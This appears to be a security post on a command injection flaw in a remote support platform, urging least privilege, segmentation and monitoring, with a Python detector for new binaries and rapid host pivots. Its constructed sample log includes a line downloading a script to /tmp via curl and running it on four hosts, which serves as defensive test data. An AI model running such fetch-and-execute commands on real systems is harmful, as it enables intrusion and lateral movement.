BeyondTrust RS/PRA command injection (CVE-2026-1731): why Zero Trust is necessary but not sufficient for remote support tools

Zero Trust won’t save you from a vulnerable admin tool by itself.

Ask one question:
If this box is compromised, what’s the maximum damage it can do in 10 minutes?

A command injection in a privileged remote support platform collapses the trust boundary, because the platform already holds the credentials, agents and tunnels it uses to reach every managed endpoint. The "helpdesk tool" becomes:
– Immediate code execution on the appliance, usually as a privileged service account
– Credential access and hijack of live technician sessions
– Fast lateral movement across every endpoint the platform can reach

Zero Trust helps only if it is translated into hard controls that shrink blast radius:
– Least privilege for the platform service accounts and integrations
– Network segmentation so the tool cannot reach everything by default
– Just-in-time access for technicians and elevated actions
– Isolation: dedicated jump hosts, separate admin planes, restricted egress
– Application allowlisting and controlled script execution
– Session recording and audit logs forwarded off the appliance in real time, so a compromised platform cannot rewrite its own history
– Compensating monitoring: alert on unusual commands, new tool binaries, and rapid host-to-host pivots
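To make the last bullet concrete, here is a small detector, added as an example (not BeyondTrust's code and not part of the original post), run over constructed command-audit lines. The line format, the baseline of known binaries, the writable-path prefixes and the "more than 3 hosts in 10 minutes" pivot threshold are all assumptions; map your own session-recording or command-audit export onto CommandEvent and tune the lists from your history.

```python
"""Compensating monitoring for a remote support platform: flag unusual
commands, new tool binaries and rapid host-to-host pivots.

Added example, not BeyondTrust code. Log format, baseline, prefixes and
thresholds are assumptions; the sample log is constructed.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class CommandEvent:
    ts: datetime
    technician: str
    host: str
    binary: str   # first argv token, assumed already resolved to a path
    argv: str     # full command line as recorded


@dataclass(frozen=True)
class Alert:
    kind: str
    technician: str
    host: str
    ts: datetime
    detail: str


# Assumed baseline: executables support sessions normally run, built from history.
KNOWN_BINARIES = {"/usr/bin/systemctl", "/usr/bin/journalctl", "/usr/bin/cat", "/usr/bin/ls"}
# Executables launched from here were almost certainly dropped during the session.
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
PIVOT_WINDOW = timedelta(minutes=10)
PIVOT_MAX_HOSTS = 3   # alert when one technician touches more distinct hosts than this per window

# Constructed sample: "<iso8601 ts> <technician> <host> <binary> [args...]"
SAMPLE_LOG = """\
2026-02-15T10:00:05+00:00 alice host-db01 /usr/bin/systemctl status postgresql
2026-02-15T10:01:10+00:00 alice host-db01 /usr/bin/journalctl -u postgresql -n 50
2026-02-15T10:02:00+00:00 bob host-web01 /usr/bin/cat /var/log/nginx/error.log
2026-02-15T10:02:30+00:00 bob host-web01 /usr/bin/curl -s http://203.0.113.7/t.sh -o /tmp/t.sh
2026-02-15T10:02:45+00:00 bob host-web01 /tmp/t.sh
2026-02-15T10:03:10+00:00 bob host-web02 /tmp/t.sh
2026-02-15T10:03:40+00:00 bob host-db01 /tmp/t.sh
2026-02-15T10:04:05+00:00 bob host-fs01 /tmp/t.sh
2026-02-15T10:40:00+00:00 alice host-web02 /usr/bin/ls -la /etc/nginx
"""


def parse_line(line: str) -> CommandEvent:
    ts, tech, host, cmd = line.split(maxsplit=3)
    return CommandEvent(datetime.fromisoformat(ts), tech, host, cmd.split()[0], cmd)


def detect(events):
    """Return alerts for new binaries, execution from writable paths and rapid pivots."""
    alerts = []
    seen = defaultdict(set)          # technician -> binaries already alerted on (dedupes new_binary)
    windows = defaultdict(deque)     # technician -> recent (ts, host) inside PIVOT_WINDOW
    pivot_open = defaultdict(bool)   # technician -> already alerted for the current burst

    for e in sorted(events, key=lambda x: x.ts):
        # New tool binary: first time this technician runs something outside the baseline.
        if e.binary not in KNOWN_BINARIES and e.binary not in seen[e.technician]:
            seen[e.technician].add(e.binary)
            alerts.append(Alert("new_binary", e.technician, e.host, e.ts, e.argv))
        # Unusual command: executable living in a user-writable location.
        if e.binary.startswith(WRITABLE_PREFIXES):
            alerts.append(Alert("writable_path_exec", e.technician, e.host, e.ts, e.argv))

        # Rapid pivot: sliding window of distinct hosts per technician.
        win = windows[e.technician]
        win.append((e.ts, e.host))
        while win and e.ts - win[0][0] > PIVOT_WINDOW:
            win.popleft()
        hosts = {h for _, h in win}
        if len(hosts) > PIVOT_MAX_HOSTS:
            if not pivot_open[e.technician]:   # alert once per burst, not per extra host
                pivot_open[e.technician] = True
                alerts.append(Alert("rapid_pivot", e.technician, e.host, e.ts,
                                    f"{len(hosts)} hosts within {PIVOT_WINDOW}: {sorted(hosts)}"))
        else:
            pivot_open[e.technician] = False
    return alerts


def run_sample():
    return detect(parse_line(l) for l in SAMPLE_LOG.splitlines() if l.strip())


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a.ts.isoformat()} {a.kind:<19} {a.technician}@{a.host}: {a.detail}")
```

On the constructed log, alice's routine session produces nothing, while bob's download-to-/tmp, execution from /tmp and fan-out to four hosts in two minutes produce alerts for each stage, so the rapid_pivot alert fires on the fourth host rather than after the whole estate is touched. The per-technician dedupe on new_binary keeps the "dropped tool" signal from drowning in the per-host writable_path_exec hits; in a real deployment the baseline and the window would be derived from recorded sessions rather than hard-coded.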

Remote support is operationally critical. Treat it like a Tier 0 asset.
Design it so compromise is survivable, not catastrophic.